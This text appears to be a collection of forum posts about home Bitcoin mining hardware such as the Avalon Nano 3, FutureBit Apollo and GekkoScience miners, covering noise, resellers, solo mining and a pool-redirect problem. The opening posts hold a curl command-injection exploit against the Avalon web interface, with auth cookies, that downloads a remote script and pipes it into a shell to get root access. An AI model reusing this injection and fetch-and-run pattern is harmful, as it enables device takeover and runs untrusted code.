Re: Avalon Nano 3 [unofficial thread]
by

Code:
curl 'http://<miner IP>/timezoneconf.cgi' \
  -b 'auth=ff0000ff4813494d137e1631bba301d5' \
  --data-raw 'timezone=%3Bwget%20http%3A%2F%2Fxn--i29h.ge%2Fn.sh%20-O-%7Csh%3B'

change the webpass is after auth= from
Code:
ff0000ff4813494d137e1631bba301d5

to
Code:
ff0000ffe489f84c23a6fbd9017f631a

for nano3s
use

Code:
8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918

after that should work.

about the last part of your post:

what this code
Code:
curl 'http://<miner IP>/timezoneconf.cgi' \
  -b 'auth=ff0000ff4813494d137e1631bba301d5' \
  --data-raw 'timezone=%3Bwget%20http%3A%2F%2Fxn--i29h.ge%2Fn.sh%20-O-%7Csh%3B'

do is download a file called n.sh and execute it. here is the decoded url

Code:
wget http://xn--i29h.ge/n.sh -O- | sh

inside that n.sh file are all the commands well explained for to get the admin access. (in short, that n.sh file do all the steps you are asking more explanation.)

if you just want to review the n.sh file before just download with
Code:
wget http://xn--i29h.ge/n.sh

another alternative is create a python local server and load that file from your computer.

cheers.

Still not working.
I get a bunch of html codes which seems to be the Avalon login page.
Maybe they did patch this.
Thanks anyway

  --data-raw 'timezone=%3Bwget%20http%3A%2F%2Fxn--i29h.ge%2Fn.sh%20-O-%7Csh%3B'

That sounds interesting.
I tried it but got an error 'Not found' from this first curl command.

The one for timezone works.

I switch the password back to root so I'm guessing it's not fetching your link?
I ran that in Linux terminal.
Is your link up and running?

Sorry I'm a real beginner.

For these next steps, are you able to give more details on how to do that?

1 - Changes the admin user password to admin. The original password hash is $5$1N6rEpvUXco$0QAASdP5iZRPWxgmAZQkTC0FM8GGw6L7HnprqT7Ll72 which I've not cracked.
2 - Generates a new ED25519 host key.
3 - Creates the jail environment the SSH daemon expects.
4 - Configures SSH as a init service.
5 - Launches the SSH service, so you don't have to reboot.

Is there any way to fix this error without reformating the node and restarting from scratch (I am at 94% now):

2025-01-30T10:27:36Z LevelDB read failure: Corruption: block checksum mismatch: /media/nvme/Bitcoin/chainstate/938066.ldb

2025-01-30T10:27:36Z You can use -debug=leveldb to get more complete diagnostic messages

5 Eh/s is obviously not only a few Apollo.
No one has that much power with our Futurebit.
Looks more like a stunt to promote sales.
You might as well connect directly to CKpool and have the same luck.

I have 1 node and 2 standard Apollo 1 units running well for a couple years.
Wanted to upgrade but the Apollo 2 is extremely overpriced compared to the Avallon.
I instead got 5 Avallon Nano 3 and thinking about the mini now.

I got that Goldshell KA Box Pro and it never hashed 1.6 TH/s.
The most I got was 1.56 TH/s.
After 1 month running fine, it dropped to 1.3 TH/s all of the sudden.
I sent my log to Goldshell and they wanted me to ship it back to Hong Kong by courier.

Problem is, I'll lose the miner for roughly a month before getting a new one, so 0 hashing, and courier from Canada to Hong Kong cost about half the cost of my miner.
Got mine for 459$ USD plus import fees.
I don't feel like paying another 200$ to send it back.

Anyone tried opening and repasting the chips?

For solo mining directly on your Apollo node, you can install Docker, then build and run a docker image of the solo ckpool using this repository: https://github.com/golden-guy/docker-ckpool

Since I don't have a full node Apollo, I cannot test and verify this myself there unfortunately. But I tested this successfully in similar setups on other SBCs (RPi/Odroid) running Debian/Ubuntu - and the Apollo's OrangePi SBC running Armbian should support the Docker installation as well, as documented here: https://docs.armbian.com/User-Guide_Advanced-Features/#how-to-run-docker

Would be great if somebody tried and can give feedback if that has worked out. At least that would be a viable workaround for now for those who feel the itch to solo mine on their Apollo node.

ckpool is solving a block more often since I've add my 3 Apollo miner a month ago and it's attracting more miner.s
We went from 26P to 98P.
The only problem is it's not me solving the blocks  with my 14 Th/s Cheesy Cheesy Cheesy

Is there any benefits using the docker as oppose to just entering the pool info?

Just use ckpool, that's what I'm doing
[/quote]

The point of mining solo directly on our node is it might be a little bit faster.
Any fraction of a seconds counts to get the edge.
ckpool is not the best with one block per 4 months and all the intermediate connections.
FutureBit told me solo mining was not ready for release yet.
Hopefully soon.

So you did not buy directly from Gekko, therefore I request you amend your statement that Gekko took your money and ran, providing no service.

It's a bit troubling that Eyeboot, who did take your money and owes you service, didn't follow up properly. Try contacting him again, and tell him I sent you.

You're right.
The reseller took the money and ran away. (amended)
Too late to get refunded.
My R606 is in the garbage for months after waiting forever and reading post from others with similar problems.
It had many failures and was discontinued and in my experience it was a bad machine marketed too quickly.

For the buyer it doesn't matter if a Samsung TV is from Walmart or Best Buy.
It's still a Samsung TV.
I have no problems with my Gekko Newpac and may give the R909 a try but I'll wait a bit  Grin

Did you buy directly from GekkoScience, or from a reseller? If so, which one?

Mine was from Amazon seller Eyeboot.
Got in contact with them and 419Mining for repair, but they were swamped with complaints with the R606 and just stopped replying.

When will direct node mining be offered? The full node package would be much more meaningful with mining the own node solo.

I heard it's still not ready for release.
I bought the full node for solo mining but so far it's not worth the extra 300$.
My standard does as good.

Top-mounted or side-mounted fan? Anyone have any pictures to share?
I used a side-mounted 120mm fan with 2 Compac F's, but if you have more chips, top mount sounds like a better idea.
You could even use a fan header splitter to use 2 or more fans, of course.

So I jsut got an email notice from Bitcoinmerch.com about NewPacs being back in stock. I thought wow.. those were from 2018 and 2019.. Really?   So I go to their website and check and sure enough BitcoinMerch.com just listed some new NewPacs for sale @$149.00 each. Says they have 12 of them.  Think they just found an old stock box of 12 sitting in the warehouse?
Honestly, ever since the R909 launched there's no better value for home mining than that. $150 is a ton of money for 45Gh/s; for 4x the price, sidehacks' latest product gets you 55x the performance. So it's basically 10 times better. Wink

Any cons with the R909?
I had the R606 but it broke within 4 months at recommended max settings.
Zero customer service with Gekko.
They took the money and ran away.
The unreliable machine made me go with the Apollo BTC miner.
Got a full node and a standard.
Both are good and about similar cost per TH
Much less problems than the R606.

The definition of quiet or silent is very dependent on the environment and the person listening to it.

Personally I refer to quiet as being basically inaudible while standing about 1 or 2 meters from it.

At 2600 RPM the stock fan is definitely audible, but for some people that can still be quiet. It can definitely get way louder at 300W+
[/quote]

True.
I did read somewhere they had a fan supply issue for a while.
Not sure if the different fans would have different noise level at same speed.

Definitely quieter than my Antminer R4 with APW7 PSU, which were sold as quiet enough for home mining, but man those are loud  Cheesy
I'm running it outdoor on the balcony it's too annoying loud.

With the Apollo I definitely hear a low fan noise at 1 or 2 meters just like a home ventilator on low.
Not annoying at all

This is the 'Base configuration' for my node and miner install guides for Futurebit Apollo BTC.
@n0nce did you purchase this Futurebit Apollo asic miner or you are just using it to run Bitcoin node?
This is the first time I saw this and it looks like interesting device with decent price, I see that batch 3 is sold out, but they are already working on batch 4.
One problem I have with asic miners is noise they are creating, but this makes almost no noise according to their website (not sure if this is true).

Note that if you just crank up the power with no other fans, it will get loud, but you can customize it so that it runs efficiently and quiet.

I have my Apollo running virtually silent. You can only hear it in the middle of the night when you're very close to it.

The first thing I had to update was the original PSU. That's not too noisy, but I replaced it with a noiseless PSU. Big difference.

The second thing to do is to keep the internal fan running as low as possible. The goal should be to keep it at around 1000-1500 rpm or less for almost no sound. Don't go past 2000rpm because it gets too loud.

To do that I just put a big 120mm Noctua fan on top of the Apollo, running silently through PWM control, helping the internal fan keeping things cool.

I then lowered the power consumption to somewhere in the middle(-brd_ocp 58).

I'm getting about 2.4TH/s at 146W, with virtually no noise.

https://i.imgur.com/f2eH4W3.png

I set up my Apollo on Turbo getting about 3 TH, using 200W with the fan running at 2600 RPM.
It's still really quiet.
Maybe the newer batch got a better fan?
I got mine about a month ago and just got a second one.
One full, one standard. No PSU. Prefer silent PSU.

My plan was to mine solo directly with the node but that's not possible yet.
They're working on it I read.
Only way is ckpool but for not I mine in pool get a bit of money back  Grin

Hello,
i am using the braiins pool stratum+tcp://eu.stratum.braiins.com:3333 with my futurebit btc miner.
after some times, all my hashrate is forwarded to this pool : stratum+tcp://btc.viabtc.com:3333 username : portforwarded.futurebit
My miner is not corrupted and i see any changes in my configuration files. it's probably a men in the middle redirecting my url.
Any help please.

Still no fix for this?
Really annoying to pay that much to hash for Futurebit !!!
My pool never dropped using the standard unit in Linux terminal.
Only switch pool with the full node unit LAN or WAN no difference.
Please update with a Pool lock command or something FutureBit.
Thanks
